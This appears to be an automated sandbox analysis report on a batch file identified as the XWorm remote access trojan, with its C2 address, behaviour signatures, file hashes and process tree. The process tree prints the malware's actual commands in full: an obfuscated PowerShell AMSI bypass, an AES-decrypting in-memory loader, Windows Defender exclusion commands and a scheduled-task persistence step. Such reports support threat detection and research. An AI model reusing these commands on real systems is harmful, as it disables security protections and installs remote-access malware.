Analysis

  • max time kernel
    17s
  • max time network
    62s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    12-11-2024 03:30

General

  • Target

    Setup.bat

  • Size

    492KB

  • MD5

    334e5ed791deb37c6838e954fda616d9

  • SHA1

    45519a533eedb9a5489b219069725ee884d6a662

  • SHA256

    996e11e2c1ddbb5a16743fafa288e5f554cf31a295b5ff8e705af30fb690ef31

  • SHA512

    88bdeb6930b66a1b86264519441207c81955183dfb5ba58705aaf9fbc2fe258dc8f13b23424596d711090380834a1354a549443d08c31b925b7a0ee9204818fc

  • SSDEEP

    12288:TV1R5Ja3/QZfusZK3VX+1VbQLGwCvn0YGZdRksyp:jtoQ5ZGpIDwCvn0YQRkvp

Malware Config

Extracted

Family

xworm

C2

here-thinking.gl.at.ply.gg:50161

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    WindowsSecurity.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:648
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:480
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{2dae04f5-966f-47d1-bd79-0d3a83b4dac1}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:996
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:704
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:1008
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:912
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1036
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1132
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1140
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1188
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1216
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QZgBfPmOuOFf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uReqRFxbOsuvxx,[Parameter(Position=1)][Type]$kunkStuxQz)$jtwWKDrAkJD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+''+'o'+''+[Char](114)+'y'+'M'+'o'+[Char](100)+'ule',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'gat'+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+'s'+'s'+''+[Char](44)+''+[Char](65)+'u'+'t'+'oC'+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$jtwWKDrAkJD.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+'p'+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+''+'g'+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$uReqRFxbOsuvxx).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');$jtwWKDrAkJD.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'ok'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+'e'+'By'+[Char](83)+''+[Char](105)+'g,'+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+''+[Char](97)+'l',$kunkStuxQz,$uReqRFxbOsuvxx).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $jtwWKDrAkJD.CreateType();}$OQHMnNpafUrAC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+'o'+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+'eNa'+[Char](116)+'i'+[Char](118)+'eM'+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+'d'+''+'s'+'');$nOojLLGGCrxYjF=$OQHMnNpafUrAC.GetMethod(''+[Char](71)+'etP'+[Char](114)+''+'o'+''+'c'+''+'A'+'d'+[Char](100)+''+'r'+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PPpeaKTFCDeYdNVdqOE=QZgBfPmOuOFf @([String])([IntPtr]);$BXCIaqLiSqLqbgVkPVjjPF=QZgBfPmOuOFf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LCIZMuKUaHh=$OQHMnNpafUrAC.GetMethod('G'+'e'+'t'+'M'+'o'+[Char](100)+'ul'+'e'+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'er'+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+'2.'+[Char](100)+''+'l'+''+'l'+'')));$bpbgSSABxxJFMK=$nOojLLGGCrxYjF.Invoke($Null,@([Object]$LCIZMuKUaHh,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$eaZNyptrkOxIeZkuO=$nOojLLGGCrxYjF.Invoke($Null,@([Object]$LCIZMuKUaHh,[Object]('V'+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+'r'+'o'+'tec'+[Char](116)+'')));$Clmcyvz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bpbgSSABxxJFMK,$PPpeaKTFCDeYdNVdqOE).Invoke('a'+[Char](109)+''+[Char](115)+'i.'+[Char](100)+'ll');$umeYRejmFFYUazDqZ=$nOojLLGGCrxYjF.Invoke($Null,@([Object]$Clmcyvz,[Object](''+'A'+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+''+'r'+'')));$gCCSxhFNGl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eaZNyptrkOxIeZkuO,$BXCIaqLiSqLqbgVkPVjjPF).Invoke($umeYRejmFFYUazDqZ,[uint32]8,4,[ref]$gCCSxhFNGl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$umeYRejmFFYUazDqZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eaZNyptrkOxIeZkuO,$BXCIaqLiSqLqbgVkPVjjPF).Invoke($umeYRejmFFYUazDqZ,[uint32]8,0x20,[ref]$gCCSxhFNGl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+'TW'+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+'7'+[Char](55)+'s'+[Char](116)+''+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:756
                      • C:\Users\Admin\AppData\Local\WindowsSecurity.exe
                        C:\Users\Admin\AppData\Local\WindowsSecurity.exe
                        2⤵
                          PID:4104
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                        1⤵
                          PID:1280
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1340
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1372
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1456
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2668
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                  1⤵
                                    PID:1624
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                    1⤵
                                      PID:1644
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1656
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1668
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1768
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1828
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1868
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1992
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1236
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1400
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2104
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:2116
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2208
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2328
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2408
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2536
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2544
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                    1⤵
                                                                      PID:2580
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2676
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2700
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2716
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2740
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2748
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2800
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3132
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3360
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Setup.bat"
                                                                                  2⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:3756
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    3⤵
                                                                                      PID:3464
                                                                                    • C:\Windows\system32\net.exe
                                                                                      net file
                                                                                      3⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2008
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 file
                                                                                        4⤵
                                                                                          PID:3808
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6Qr7qHDKJjMpmgIjSPfD44cTPtNyBSLGu8hDw8CfoaU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g7PbVoDhe/kTO9wMHyLfTA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lnXbU=New-Object System.IO.MemoryStream(,$param_var); $serAy=New-Object System.IO.MemoryStream; $mBSQd=New-Object System.IO.Compression.GZipStream($lnXbU, [IO.Compression.CompressionMode]::Decompress); $mBSQd.CopyTo($serAy); $mBSQd.Dispose(); $lnXbU.Dispose(); $serAy.Dispose(); $serAy.ToArray();}function execute_function($param_var,$param2_var){ $DMigp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vmAAk=$DMigp.EntryPoint; $vmAAk.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Setup.bat';$sKPoD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Setup.bat').Split([Environment]::NewLine);foreach ($cbgZM in $sKPoD) { if ($cbgZM.StartsWith(':: ')) { $HzSkD=$cbgZM.Substring(3); break; }}$payloads_var=[string[]]$HzSkD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                        3⤵
                                                                                        • Blocklisted process makes network request
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Drops startup file
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4664
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2532
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2008
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:932
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4564
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:1984
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\WindowsSecurity.exe'
                                                                                              4⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3276
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                5⤵
                                                                                                  PID:3644
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSecurity.exe'
                                                                                                4⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4412
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                    PID:4228
                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSecurity" /tr "C:\Users\Admin\AppData\Local\WindowsSecurity.exe"
                                                                                                  4⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:3652
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    5⤵
                                                                                                      PID:3128
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /delete /f /tn "WindowsSecurity"
                                                                                                    4⤵
                                                                                                      PID:3148
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDF25.tmp.bat""
                                                                                                      4⤵
                                                                                                        PID:1224
                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                          timeout 3
                                                                                                          5⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:2576
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                  1⤵
                                                                                                    PID:3528
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                    1⤵
                                                                                                      PID:3548
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:3916
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:3992
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:3420
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                            1⤵
                                                                                                              PID:3588
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                              1⤵
                                                                                                                PID:4396
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                1⤵
                                                                                                                  PID:4500
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                  1⤵
                                                                                                                    PID:5084
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                    1⤵
                                                                                                                      PID:4160
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                      1⤵
                                                                                                                        PID:3540
                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                        1⤵
                                                                                                                          PID:4232
                                                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:1524
                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                            1⤵
                                                                                                                              PID:1564
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                              1⤵
                                                                                                                                PID:2000
                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                1⤵
                                                                                                                                  PID:4640
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:4132
                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:3040
                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                      1⤵
                                                                                                                                        PID:2860
                                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                        1⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:1856

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        627073ee3ca9676911bee35548eff2b8

                                                                                                                                        SHA1

                                                                                                                                        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                                                                                        SHA256

                                                                                                                                        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                                                                                        SHA512

                                                                                                                                        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        6ed6547d270ec2a3219183bfa73bc09b

                                                                                                                                        SHA1

                                                                                                                                        efbcbdbdccab903a79b2b0a65d882eca8bb81363

                                                                                                                                        SHA256

                                                                                                                                        f7511aa08a289c57af48cfffb1361623c47df6324b80f94841ba69c9497f9ac2

                                                                                                                                        SHA512

                                                                                                                                        d396cd37f446f9798dcd60229f0c2f55a4bdc0541149dea4be51236e7d91bc65f2bf9eee8327beafc3fe387dded9c3cc049e2101137e73956194e88939a7ec72

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                        Filesize

                                                                                                                                        944B

                                                                                                                                        MD5

                                                                                                                                        d0a4a3b9a52b8fe3b019f6cd0ef3dad6

                                                                                                                                        SHA1

                                                                                                                                        fed70ce7834c3b97edbd078eccda1e5effa527cd

                                                                                                                                        SHA256

